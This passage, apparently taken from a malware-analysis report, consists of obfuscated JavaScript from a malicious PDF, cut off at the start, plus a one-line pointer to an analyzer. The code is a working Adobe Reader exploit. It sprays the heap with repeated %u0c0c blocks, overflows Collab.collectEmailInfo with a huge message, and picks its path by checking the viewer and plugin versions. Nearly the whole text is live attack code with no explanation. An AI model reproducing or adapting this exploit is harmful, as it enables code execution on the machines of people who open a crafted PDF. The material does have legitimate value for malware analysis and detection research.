b__Tn_P_V7ad3.length 2;var qUa_q_____04 = C6FC__dy - (m7_RD_BW+0x38);JR_wPPT = V_35NWJN_x(JR_wPPT, qUa_q_____04);var uJASCrIO8Yq = (i0pUV1_23h5r - 0x400000)/C6FC__dy;for (var l7_A___8koF = 0; l7_A___8koF < uJASCrIO8Yq; l7_A___8koF++) {Ove55p__x[l7_A___8koF] = JR_wPPT + b__Tn_P_V7ad3;}}function WPT_6_8x7_73(){var W_8Vy8G__D = "";for (qYQ_xO___8 = 0; qYQ_xO___8 < 12; qYQ_xO___8++) {W_8Vy8G__D += unescape("%u0c0c%u0c0c");}var P4_188s = "";for (qYQ_xO___8 = 0; qYQ_xO___8 < 750; qYQ_xO___8++) {P4_188s += W_8Vy8G__D;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: P4_188s});app.clearTimeOut(T_8_wO7d);}function c7uyhr5j_d_37(h_X24p__23S){var MeN4y__3_v = T_8_wO7d;if ((h_X24p__23S >= 8 && h_X24p__23S < 8.11) \|\| h_X24p__23S < 7.1) {e_3l_U550_gUg(23, "%u0c0c%u0c0c", h_X24p__23S);WPT_6_8x7_73();}if (MeN4y__3_v) {app.clearTimeOut(MeN4y__3_v);}}var M_H_8BR1_4O = 0;var gF_k_u = app.plugIns;for (var Cd_032_Y_5Y = 0; Cd_032_Y_5Y < gF_k_u.length; Cd_032_Y_5Y++) {var e_Iwk_BF_S_Lh = gF_k_u[Cd_032_Y_5Y].version;if (e_Iwk_BF_S_Lh > M_H_8BR1_4O) { M_H_8BR1_4O = e_Iwk_BF_S_Lh; }}if (app.viewerVersion == 9.103 && M_H_8BR1_4O < 9.13) {M_H_8BR1_4O = 9.13;}app.NAJCoepJ = c7uyhr5j_d_37;T_8_wO7d = app.setTimeOut("app.NAJCoepJ(" + M_H_8BR1_4O.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.